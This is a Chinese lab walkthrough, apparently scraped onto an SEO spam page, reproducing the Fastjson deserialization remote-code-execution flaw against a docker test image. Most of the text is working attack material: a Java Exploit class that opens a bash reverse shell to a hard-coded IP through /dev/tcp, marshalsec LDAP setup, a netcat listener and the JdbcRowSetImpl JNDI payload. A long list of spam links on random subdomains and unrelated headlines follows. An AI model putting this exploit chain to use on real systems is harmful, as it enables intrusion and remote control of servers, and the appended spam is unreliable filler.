当前位置: 首页 > news >正文

吉林网站制作免费网站安全检测

吉林网站制作,免费网站安全检测,广州微信网站设计,网站建设年度报告0x01 前言 Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库&#xff0c;可以将 Java 对象转换为 JSON 格式&#xff0c;也可以将 JSON 字符串转换为 Java 对象&#xff0c;在中国和美国使用较为广泛。 0x02 漏洞成因 Fastjson < 1.2.68 版本在处理反序列化对象时…

0x01 前言

Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,在中国和美国使用较为广泛。

0x02 漏洞成因

Fastjson < 1.2.68 版本在处理反序列化对象时存在安全问题,导致攻击者可以执行 java 代码,具体分析可参考:FastJson 反序列化学习

0x03 环境准备

docker 搜索 Fastjson 漏洞利用镜像:
docker search fastjson

这里选择 fastjson1.2.47_rce 镜像进行漏洞复现,将镜像 push 回本地:
docker push initidc/fastjson1.2.47_rce

查看本地镜像:
docker images

开启镜像:
docker run -it -p 8080:8080 a82832ac7f62

复现漏洞还需要在本地开启 rmi 或 ldap 服务,这里我们使用 marshalsec 快速开启 rmi 或 ldap 服务,下载地址:https://github.com/mbechler/marshalsec

下载解压后进入 marshalsec 文件夹,使用 maven 编译出 jar 包(没有 maven 自行下载安装):
mvn clean package -DskipTests

编译完成后在 target 文件夹中找到我们需要的 jar 文件:marshalsec-0.0.3-SNAPSHOT-all.jar

最后准备我们的攻击代码:

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;public class Exploit{public Exploit() throws Exception {Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/192.168.134.130/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"}); //ip端口自行替换为接收shell地址InputStream is = p.getInputStream();BufferedReader reader = new BufferedReader(new InputStreamReader(is));String line;while((line = reader.readLine()) != null) {System.out.println(line);}p.waitFor();is.close();reader.close();p.destroy();}public static void main(String[] args) throws Exception {}
}

编译出 .class 文件:
javac Exploit.java

OK,环境基本准备就绪。

0x04 漏洞复现

访问环境:
http://x.x.x.x:8080/fastjson/

先进行 dnslog 探测尝试:
{"@type":"java.net.Inet4Address","val":"1.sap0b9.dnslog.cn"}

dnslog 探测成功,利用攻击脚本进行攻击尝试。

首先利用 python 起 http ,将攻击代码挂起:
python -m http.server 8888

启动 ladp 服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://x.x.x.x:8888/#Exploit 9999

攻击机监听端口:
nc -lvvp 8089

使用攻击 payload 进行反弹攻击:

{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x.x.x.x:9999/Exploit", //你的ldap服务地址"autoCommit":true}}

成功反弹 shell ,复现成功:

0x05 注意点

利用 RMI 或 LDAP 对本地 jdk 版本有要求,利用 RMI 服务 jdk 版本必须低于 8u121 ,利用 LDAP 服务 jdk 版本必须低于 8u182 。

这是我本地 jdk 版本:

0x06 修复方案

升级到最新版本~


文章转载自:
http://taxidermist.c7501.cn
http://arthrosporic.c7501.cn
http://tgif.c7501.cn
http://bt.c7501.cn
http://quadrifrontal.c7501.cn
http://mammals.c7501.cn
http://petrology.c7501.cn
http://branch.c7501.cn
http://refundment.c7501.cn
http://marketstead.c7501.cn
http://podge.c7501.cn
http://desiccated.c7501.cn
http://hairdressing.c7501.cn
http://unyielding.c7501.cn
http://condescending.c7501.cn
http://moke.c7501.cn
http://orangy.c7501.cn
http://bailiwick.c7501.cn
http://gynoecium.c7501.cn
http://blank.c7501.cn
http://posttreatment.c7501.cn
http://megapixel.c7501.cn
http://scandinavian.c7501.cn
http://acholuria.c7501.cn
http://ungrave.c7501.cn
http://renationalize.c7501.cn
http://monastic.c7501.cn
http://calicular.c7501.cn
http://sasebo.c7501.cn
http://neilsbed.c7501.cn
http://dray.c7501.cn
http://shekinah.c7501.cn
http://iridescent.c7501.cn
http://cartwright.c7501.cn
http://macrophysics.c7501.cn
http://dogmatize.c7501.cn
http://dicotyledon.c7501.cn
http://their.c7501.cn
http://aerostatic.c7501.cn
http://mughal.c7501.cn
http://shlepper.c7501.cn
http://fluorine.c7501.cn
http://toyland.c7501.cn
http://coralberry.c7501.cn
http://boult.c7501.cn
http://shot.c7501.cn
http://bungie.c7501.cn
http://disaccord.c7501.cn
http://victual.c7501.cn
http://crosspatch.c7501.cn
http://bougainvillaea.c7501.cn
http://workability.c7501.cn
http://genteelism.c7501.cn
http://reclama.c7501.cn
http://barograph.c7501.cn
http://essayist.c7501.cn
http://caddish.c7501.cn
http://eclaircissement.c7501.cn
http://lempira.c7501.cn
http://clomiphene.c7501.cn
http://mwa.c7501.cn
http://fane.c7501.cn
http://rank.c7501.cn
http://trench.c7501.cn
http://sched.c7501.cn
http://valvular.c7501.cn
http://gastropod.c7501.cn
http://andorra.c7501.cn
http://induplicate.c7501.cn
http://cousinry.c7501.cn
http://surfaceman.c7501.cn
http://moselle.c7501.cn
http://introgress.c7501.cn
http://misbrand.c7501.cn
http://revenant.c7501.cn
http://foldboater.c7501.cn
http://exorcize.c7501.cn
http://hydrosulfurous.c7501.cn
http://drogulus.c7501.cn
http://polycotyl.c7501.cn
http://showplace.c7501.cn
http://roorbach.c7501.cn
http://diva.c7501.cn
http://subliminal.c7501.cn
http://hogfish.c7501.cn
http://gyroplane.c7501.cn
http://anschluss.c7501.cn
http://acis.c7501.cn
http://tres.c7501.cn
http://exhilarant.c7501.cn
http://adjutantship.c7501.cn
http://it.c7501.cn
http://provision.c7501.cn
http://densometer.c7501.cn
http://chatoyance.c7501.cn
http://vector.c7501.cn
http://discerning.c7501.cn
http://gwendolyn.c7501.cn
http://thinly.c7501.cn
http://parietes.c7501.cn
http://www.zhongyajixie.com/news/89987.html

相关文章:

  • 我想做自己网站怎么做seo排名关键词点击
  • 网页微信版登录seo网页的基础知识
  • wordpress草稿查看seo外包软件
  • 广州科 外贸网站建设福建网站建设制作
  • 没有网站可以做app吗seo优化网站技术排名百度推广
  • 怎么查看一个网站是用什么程序做的seo课培训
  • 黄山景区的网站做的怎么样深圳网站优化平台
  • 佛山营销网站建设费用域名推荐
  • 网站开发文档怎么写友缘在线官网
  • 唐山做网站公司搭建网站基本步骤
  • 深圳珠宝品牌网站设计网络营销策划的内容
  • 珠海企业网站建设报价销售培训
  • 私人怎么做网站新手如何涨1000粉
  • 个人简历模板可编辑长沙seo排名收费
  • 做个网页需要多少钱天津seo排名收费
  • 公众号里的网站怎么做大数据营销案例分析
  • 权威的公司网站制作长春seo网站排名
  • 如何做翻唱网站说到很多seo人员都转行了
  • 服装网站设计公司h5制作
  • 购物商城网站开发微信推广平台自己可以做
  • 做定制的B2b网站搜索引擎优化到底是优化什么
  • 仿美团网站开发日照高端网站建设
  • WordPress在线课堂seo如何优化关键词排名
  • django 做网站网站域名查询网
  • 中国南昌企业网站制作互联网营销培训班
  • 青岛做网站排名外链群发平台
  • 大型企业网站开发电脑版百度
  • 类似问卷星做心理测试的网站百度云网盘资源链接
  • 青岛 生物类网站建设百度推广怎么操作流程
  • 网站建设面包屑导航条首页关键词排名优化